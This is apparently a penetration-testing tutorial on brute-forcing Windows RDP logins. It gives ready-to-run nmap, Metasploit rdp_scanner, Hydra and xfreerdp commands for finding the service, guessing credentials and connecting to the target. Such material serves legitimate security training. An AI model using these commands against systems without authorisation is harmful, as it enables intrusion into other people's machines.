Exploiting RDP - Brute Force

Exploiting RDP

• The Remote Desktop Protocol (RDP) is a proprietary GUI remote access protocol developed by Microsoft and is used to remotely connect and interact with a Windows system.

• RDP uses TCP port 3389 by default, and can also be configured to run on any other TCP port.

• RDP authentication requires a legitimate user account on the target system as well as the user’s password in clear-text.

• We can perform an RDP brute-force attack to identify legitimate user credentials that we can use to gain remote access to the target system </aside>

Attack Flow for the Exploiting RDP - Brute Force

1. Identify Running Services and Their Versions

Objective: Determine the versions of the running services on the target system.

Command:

nmap -sV -O <Target_IP>

Description: Use Nmap to scan the target system and identify the versions of the running services.

Alternative Command Using Metasploit:

msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <Target_IP>
run

Description: Use the rdp_scanner module in Metasploit to identify RDP service details on the target system.

2. Perform Brute Force Attack

Objective: Obtain valid RDP credentials through a brute force attack.

Command:

hydra -L <user-list> -P <pass-list> rdp://<target-ip> -s <port>

Description: Use Hydra to perform a brute force attack on the RDP service of the target system using specified user and password lists.

3. Establish RDP Connection

Objective: Connect to the victim's machine using the obtained credentials.

Command:

xfreerdp /u:<user> /p:<password> /v:<Target_IP>:<port>

Description: Use xfreerdp to establish an RDP connection to the target system with the obtained username and password.

Hacker's Mantra:Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause. - Kevin Mitnick